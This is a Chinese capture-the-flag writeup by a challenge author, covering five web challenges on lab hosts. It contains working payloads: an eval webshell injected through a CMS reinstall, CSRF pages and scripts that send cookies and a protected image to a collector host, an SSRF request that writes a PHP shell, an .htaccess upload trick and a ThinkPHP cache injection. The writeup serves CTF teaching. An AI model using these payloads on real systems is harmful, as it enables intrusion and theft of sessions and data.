巅峰极客Web - Writeup

前言

这次和另外一个师傅合作出了几个web，出题时间太仓促，所以很多地方有些考虑不周，望多多见谅。
接到任务是说多偏向实战，那就只能用一些最新的CMS来上了，这次题目大概是dedefun的1day利用，其余的则是网络公开漏洞或者是常规渗透思路即可解决。过程中发现各种师傅们直接掏出0day就是干，很是膜拜呀 ~

pentest

目录扫描得到file/file.php，然后猜测可以跨目录删除文件

删除文件后重装metinfo，重装的时候数据库名填写:

met#*/@eval($_GET[1]);/*

密码填写为root，这里提一句，由于平台的网络acl问题，所以所有的环境都是不能外连mysql的，导致会有一点坑。

最后就是getshell拿flag

mysqlonline

通过mysql执行，经过hex编码后，输出可以造成xss
select 0x3c7363726970743e616c6572742831293c2f7363726970743e

结合csrf即可打到后台

<!-- CSRF page: history.pushState() hides the real URL, then the hidden form auto-submits a cross-site
     POST to runsql.php. The hex literal decodes to `0x<script src=http://ip/xss/1.js></script>`
     (the leading "0x" text looks like a copy artifact), which the backend presumably renders unescaped.
     The form carries no anti-CSRF token and relies on the victim's ambient session cookie; a per-request
     token or SameSite session cookies would block this step. -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://love.lemon/runsql.php" method="POST">
      <input type="hidden" name="sql" value="select 0x30783c736372697074207372633d687474703a2f2f69702f7873732f312e6a733e3c2f7363726970743e" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

提交。
其中加载的js内容为:

// First-stage payload loaded by the injected <script src=.../1.js>: redirects the victim's browser to
// the collector with document.cookie base64-encoded between the "aaa" markers in the query string.
// Only cookies without the HttpOnly flag are readable from script here, so marking the session cookie
// HttpOnly (and encoding the reflected SQL output) stops this step.
self.location = 'http://ip/x.php?v=aaa'+btoa(document.cookie)+'aaa';

可以从服务器上面知道，有管理员登录了后台，但是地址是127.0.0.1的。

访问: http://love.lemon/admin_zzzz666.php

提示后台只能从127.0.0.1访问。
所以需要改一下前面的csrf html

<!-- Same CSRF page as above, with the form action pointed at 127.0.0.1: the backend only accepts
     requests from loopback, and that allowlist is sidestepped because the POST is issued by the
     administrator's own browser. A source-IP check is not a substitute for a CSRF token. -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/runsql.php" method="POST">
      <input type="hidden" name="sql" value="select 0x30783c736372697074207372633d687474703a2f2f69702f7873732f312e6a733e3c2f7363726970743e" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

然后便可以打到cookie

通过页面源码获取可以知道一个
./static/img/iamsecret_555.jpg

外网直接访问是不行的，会403，需要通过xss来获取图片内容。flag也在图片上面。

// Second-stage payload, presumably run in the administrator's browser on http://127.0.0.1 (see the
// CSRF form above). The image at /static/img/iamsecret_555.jpg answers 403 from outside, so it is
// loaded by the victim's browser, re-encoded through a canvas and POSTed to the collector x.php.
// Defender notes: this only works because the SQL result is rendered unescaped (stored XSS); output
// encoding plus a CSP with restrictive script-src/connect-src would stop both the script load and
// the outbound POST.
var love = {
  // Minimal XHR factory with legacy ActiveX fallbacks; returns false when none is available.
  ajax: function () {
    var a;
    try {
      a = new XMLHttpRequest()
    } catch (e) {
      try {
        a = new ActiveXObject("Msxml2.XMLHTTP")
      } catch (e) {
        try {
          a = new ActiveXObject("Microsoft.XMLHTTP")
        } catch (e) {
          return false
        }
      }
    }
    return a
  },
  // req(url, data, method, callback): method defaults to GET; data may be a string (sent as-is)
  // or an object (form-encoded key by key); callback receives the XHR once readyState is 4.
  req: function (b, c, d, e) {
    d = (d || "").toUpperCase();
    d = d || "GET";
    c = c || "";
    if (b) {
      var a = this.ajax();
      a.open(d, b, true);
      // POST bodies are declared as application/x-www-form-urlencoded.
      if (d == "POST") {
        a.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
      }
      a.onreadystatechange = function () {
        if (a.readyState == 4) {
          if (e) {
            e(a)
          }
        }
      };
      if ((typeof c) == "object") {
        var f = [];
        for (var i in c) {
          f.push(i + "=" + encodeURIComponent(c[i]))
        }
        a.send(f.join("&"))
      } else {
        // String payloads are not encoded here.
        a.send(c || null)
      }
    }
  },
  get: function (a, b) {
    this.req(a, "", "GET", b)
  },
  post: function (a, b, c) {
    this.req(a, b, "POST", c)
  }
};

// Resolves with the image at `img` drawn onto a canvas and serialised with canvas.toDataURL().
function getBase64(img) {
    // width/height: pass concrete pixel values to control the output size; when omitted the
    // image's own dimensions are used.
    function getBase64Image(img, width, height) {
        var canvas = document.createElement("canvas");
        canvas.width = width ? width : img.width;
        canvas.height = height ? height : img.height;
        var ctx = canvas.getContext("2d");
        ctx.drawImage(img, 0, 0, canvas.width, canvas.height);
        var dataURL = canvas.toDataURL();
        return dataURL;
    }
    var image = new Image();
    // Requests the image with CORS so toDataURL() is not blocked by canvas tainting; the image is
    // same-origin with the page this runs on (127.0.0.1), so it would not be tainted anyway.
    image.crossOrigin = '';
    image.src = img;
    return new Promise((resolve, reject) => {
        image.onload = function () {
            resolve(getBase64Image(image)); // hand the base64 to the upload step
        }
        // NOTE(review): no onerror handler is wired, so a failed load never settles the promise
        // and the rejection handler below is unreachable.
    });
}

getBase64('http://127.0.0.1/static/img/iamsecret_555.jpg').then(base64 => {
    // "v=" + base64 is sent without URL-encoding: the '+' characters of the base64 data URL reach
    // x.php as spaces (the writeup converts them back afterwards).
    love.post(
      "http://ip/xss/x.php",
      "v=" + base64,
      function (res) {
        console.log(res);
      }
    );
}, err => {
    console.log(err)
})

获取图片内容
X.php内容

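<?php
// Collector for the canvas exfiltration payload: the wildcard CORS header lets the cross-origin XHR
// read the reply, and the POSTed data URL (`v`) is written straight to disk.
header('Access-Control-Allow-Origin: *');
file_put_contents('log.txt', $_POST['v']);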

最后会获取到图片，当然这个过程中+会被转换为空格，所以后面还要转换回来。

dedeFun

题目描述:

运维自己的网站，我还是喜欢用shell的方式，这样肯定没人能日进来了。

1.php

<?php
if ($_SERVER['REMOTE_ADDR'] !== '127.0.0.1') {
    die('Who are you? your ip is:'.$_SERVER['REMOTE_ADDR']);
}
$_GET['a']($_GET['b']);
?>

感觉很傻的故事，没法，不知道如何去设计这个考点，但是从上来看，肯定是靠ssrf的点。
考点便是前段时间一个思路很棒的漏洞： dedecms利用通配符找后台目录

当然 getimagesize 这个函数还可以远程http请求，导致可以进行ssrf，有兴趣的朋友可以跟进php内核看下。

所以接下来就比较简单了，直接利用本身的shell去操作即可。

POST /tags.php HTTP/1.1
Host: love.lemon
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,ja;q=0.6
Cookie: YDAL_2132_saltkey=umJCWaoK; YDAL_2132_lastvisit=1531231707; YDAL_2132_ulastactivity=8d9ffh%2BiVUvLiWxFVmAltTKPHq5V9hUJ5PvDa4s84r553KMhDZMx; YDAL_2132_auth=a017j1pf9qMN%2F5Pa1g7C6kyv3ik6f%2B7eqtppI5c6sSWzI0ggQU5wSkRNDoXuXqvSSMnI%2BN3ObxEMn7jaaNJW; YDAL_2132_nofavfid=1; YDAL_2132_lip=10.211.55.2%2C1531237092; YDAL_2132_home_diymode=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 251

dopost=save&_FILES[lsa][tmp_name]=http://127.0.0.1/1.php?a=assert%26b=file_put_contents($_GET[1],base64_decode($_GET[2]));%261=./uploads/soft/aaaa.php%262=PD9waHAgcGhwaW5mbygpOyA/Pg==&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif

babyweb

首先看到首页:

用户名 [email protected]

猜测密码为弱口令 [email protected]
登陆后发现任意文件上传，但是只能图片格式

用top100密码爆破mysql，1q2w3e4r5t6y，这里本来是用root，但是搅屎太多，改为了babyweb

进入后发现

然后更改type的json数据为
{"0":"png","1":"gif","2":"jpg","3":"xxx","5":"htaccess"}
即可上传htaccess

AddType application/x-httpd-php .xxx
php_flag engine 1

上传后，在file下可以看到文件名

然后访问../img/name.xxx即可shell

A Simple CMS

考点就是thinkphp的缓存getshell漏洞，当然先得发现备份文件www.zip，然后进行审计。

/* Fetch cached data: fall back to the framework cache (S()) only when $list is empty */
if(empty($list)){
    $list = S('sys_user_nickname_list');
}

审计代码发现更改了源码
因为用户名有长度限制
于是直接这样就OK

%[email protected]`$_GET[c]`;//

然后即可拿到shell

http://127.0.0.1:8097/Runtime/Temp/onethink_6d11f0be3af9c28d4120c8fd5fe65a40.php

http://127.0.0.1:8097/Runtime/Temp/onethink_6d11f0be3af9c28d4120c8fd5fe65a40.php?c=cat /flag>/tmp/flag